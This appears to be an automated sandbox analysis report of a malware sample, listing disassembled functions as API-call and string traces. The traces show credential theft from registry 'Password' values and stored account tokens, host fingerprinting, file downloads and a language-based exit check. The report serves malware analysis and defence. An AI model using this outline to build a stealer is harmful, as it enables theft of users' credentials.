strtok_s.MSVCRT ref: 048D1C07

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
String ID:
API String ID: 4276352425-0
Opcode ID: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
Instruction ID: cbd3579306467b9e20b5cac67a16f477a6f9eb6fa234ea1d9992a27a99ca41dc
Opcode Fuzzy Hash: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
Instruction Fuzzy Hash: F57154B2D021189BDB14FB64DC88EEE7379AF54304F044E99E50AE3140EEB5AA84CF52

Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407374
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB

task.LIBCPMTD ref: 004075B5

Strings

Password, xrefs: 00407461

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95

Function 048D78F7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 048D7939
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 048D7976
GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D79FA
RtlAllocateHeap.NTDLL(00000000), ref: 048D7A01
wsprintfA.USER32 ref: 048D7A37

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Strings

:, xrefs: 048D7953
\, xrefs: 048D7957
C, xrefs: 048D7943

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction ID: 0392557358e36a1a54bb837109f83d40eb06cfd5e13ef2f58054c9fdb79c91b2
Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction Fuzzy Hash: 3D41A3B1D05258EBDB10DF94CC85BDEBBB8AF48704F004599F509A7280E775AB84CBA6

Function 048D84F7 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006D6D60,00000000,?,00420E14,00000000,?,00000000), ref: 048D8527
RtlAllocateHeap.NTDLL(00000000), ref: 048D852E
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 048D854F
__aulldiv.LIBCMT ref: 048D8569
__aulldiv.LIBCMT ref: 048D8577
wsprintfA.USER32 ref: 048D85A3

Strings

pkm, xrefs: 048D8592, 048D8595
@, xrefs: 048D8544

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: @$pkm
API String ID: 2774356765-1350193380
Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction ID: 74717b74ffd9f982c6470722b8ae398c3b311a5d9488e3e410d2ed48f3743c61
Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction Fuzzy Hash: B9210BB1E45358ABDB00DBD4CC45FAEBBB9FB44B15F104609F615BB280D77869008BA5

Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
StrCmpCA.SHLWAPI(?,02EB7320), ref: 00406197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
InternetCloseHandle.WININET(00412DB1), ref: 004062A3
InternetCloseHandle.WININET(00000000), ref: 004062B0

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
Opcode Fuzzy Hash: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59

Function 048C6357 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
Part of subcall function 048C4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
Part of subcall function 048C4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00

InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 048C63C6
StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C63FE
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 048C6446
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 048C646A
InternetReadFile.WININET(?,?,00000400,?), ref: 048C6493
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 048C64C1
CloseHandle.KERNEL32(?,?,00000400), ref: 048C6500
InternetCloseHandle.WININET(?), ref: 048C650A
InternetCloseHandle.WININET(00000000), ref: 048C6517

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
Instruction ID: afce178bf3ee3902563cc06a87e4884d3dab663569dc2ec25ca426f8f708b10b
Opcode Fuzzy Hash: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
Instruction Fuzzy Hash: 4F5160B1A00218ABDB24DF64DC44BEE7779AB44305F1086ADE605F71C0EBB4BA85CF95

Function 048D5227 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 048D523E

Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202

lstrcat.KERNEL32(?,00000000), ref: 048D5267
lstrcat.KERNEL32(?,00420FE8), ref: 048D5284

Part of subcall function 048D4DC7: wsprintfA.USER32 ref: 048D4DE3
Part of subcall function 048D4DC7: FindFirstFileA.KERNEL32(?,?), ref: 048D4DFA

memset.MSVCRT ref: 048D52CA
lstrcat.KERNEL32(?,00000000), ref: 048D52F3
lstrcat.KERNEL32(?,00421008), ref: 048D5310

Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 048D4E28
Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 048D4E3E
Part of subcall function 048D4DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 048D5034
Part of subcall function 048D4DC7: FindClose.KERNEL32(000000FF), ref: 048D5049

memset.MSVCRT ref: 048D5356
lstrcat.KERNEL32(?,00000000), ref: 048D537F
lstrcat.KERNEL32(?,00421020), ref: 048D539C

Part of subcall function 048D4DC7: wsprintfA.USER32 ref: 048D4E67
Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,004208D3), ref: 048D4E7C
Part of subcall function 048D4DC7: wsprintfA.USER32 ref: 048D4E99
Part of subcall function 048D4DC7: PathMatchSpecA.SHLWAPI(?,?), ref: 048D4ED5
Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,006D6F24), ref: 048D4F01
Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,00420FE0), ref: 048D4F13
Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,?), ref: 048D4F27
Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,00420FE4), ref: 048D4F39
Part of subcall function 048D4DC7: lstrcat.KERNEL32(?,?), ref: 048D4F4D
Part of subcall function 048D4DC7: CopyFileA.KERNEL32(?,?,00000001), ref: 048D4F63
Part of subcall function 048D4DC7: DeleteFileA.KERNEL32(?), ref: 048D4FE8

memset.MSVCRT ref: 048D53E2

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 4017274736-0
Opcode ID: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
Instruction ID: e3d5c37b826010ac71a8e244e67c5ecca9b36882056f9af915f6d2ffa03d4eae
Opcode Fuzzy Hash: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
Instruction Fuzzy Hash: 5D4184B5E4021867EB14F770EC4AFDD73385B24705F804A55B689E60D0EEF967C88B92

Function 0493F595 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0493F6B4
___TypeMatch.LIBVCRUNTIME ref: 0493F7C2
CatchIt.LIBVCRUNTIME ref: 0493F813
CallUnexpected.LIBVCRUNTIME ref: 0493F92F

Strings

csm, xrefs: 0493F5D2
csm, xrefs: 0493F6EB
csm, xrefs: 0493F63F

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction ID: fe5b3d8fe20018bae7ee35aaa9118d6b5b156ca398e1c096d0a048c87f13e9eb
Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
Instruction Fuzzy Hash: 93B15A35D00209EFDF18DFA4C8809AEB7B9FF8631AB14457AE8156B219D331EA51CF91

Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
memset.MSVCRT ref: 004173EA
??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
Opcode Fuzzy Hash: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59

Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrlenA.KERNEL32(00000000), ref: 0040BC6F

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
lstrlenA.KERNEL32(00000000), ref: 0040BD75
lstrlenA.KERNEL32(00000000), ref: 0040BD89

Strings

AccountTokens, xrefs: 0040BA8A
AccountId, xrefs: 0040BC94
AccountTokens, xrefs: 0040BB19
SELECT service, encrypted_token FROM token_service, xrefs: 0040BBBB

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
Opcode Fuzzy Hash: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A

Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0040A0BE
GetProcAddress.KERNEL32(00000000,free_result), ref: 0040A0D5
FreeLibrary.KERNEL32(00000000,?,004108E4), ref: 0040A0F9

Strings

connect_to_websocket, xrefs: 0040A0B3
free_result, xrefs: 0040A0C9
C:\ProgramData\chrome.dll, xrefs: 0040A093

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 2256533930-1545816527
Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B

Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
ExitProcess.KERNEL32 ref: 00416A45
ExitProcess.KERNEL32 ref: 00416A4F
ExitProcess.KERNEL32 ref: 00416A59
ExitProcess.KERNEL32 ref: 00416A63
ExitProcess.KERNEL32 ref: 00416A6D

Strings

*, xrefs: 00416A2C

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52

Function 048C7897 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 048C7597: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 048C7601
Part of subcall function 048C7597: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 048C7678
Part of subcall function 048C7597: StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 048C76D4
Part of subcall function 048C7597: GetProcessHeap.KERNEL32(00000000,?), ref: 048C7719
Part of subcall function 048C7597: HeapFree.KERNEL32(00000000), ref: 048C7720

lstrcat.KERNEL32(006D7068,0042192C), ref: 048C78CD
lstrcat.KERNEL32(006D7068,00000000), ref: 048C790F
lstrcat.KERNEL32(006D7068,00421930), ref: 048C7921
lstrcat.KERNEL32(006D7068,00000000), ref: 048C7956
lstrcat.KERNEL32(006D7068,00421934), ref: 048C7967
lstrcat.KERNEL32(006D7068,00000000), ref: 048C799A
lstrcat.KERNEL32(006D7068,00421938), ref: 048C79B4
task.LIBCPMTD ref: 048C79C2

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID:
API String ID: 2677904052-0
Opcode ID: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
Instruction ID: 6a0ff70b50f372ddacf98c3747f80918e5662d230628af4a30a49d31d20304e4
Opcode Fuzzy Hash: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
Instruction Fuzzy Hash: 4D3182B1E051099FDB04EBE4EC54DFE7736AB44305F105619E102A32A0EB74FA85CB92

Function 048C5267 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 048C5281
RtlAllocateHeap.NTDLL(00000000), ref: 048C5288
InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 048C52A1
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 048C52C8
InternetReadFile.WININET(?,?,00000400,00000000), ref: 048C52F8
memcpy.MSVCRT(00000000,?,00000001), ref: 048C5341
InternetCloseHandle.WININET(?), ref: 048C5370
InternetCloseHandle.WININET(?), ref: 048C537D

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
Instruction ID: 7b09e40d2eebfec3754e175d0c75c6c3751b2335651d3b6ec2ebc66d5da739c2
Opcode Fuzzy Hash: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
Instruction Fuzzy Hash: B93119B4E01228EBDB20CF94DC84BDCB7B5AB48304F5086D9F609A7280D7B06AC58F59

Function 048D59C7 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 048DAD97: lstrlen.KERNEL32(048C51BC,?,?,048C51BC,00420DDF), ref: 048DADA2
Part of subcall function 048DAD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 048DADFC

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

StrCmpCA.SHLWAPI(00000000,004210B0,00000000), ref: 048D5AFB
StrCmpCA.SHLWAPI(00000000,004210B8), ref: 048D5B58
StrCmpCA.SHLWAPI(00000000,004210C8), ref: 048D5D0E

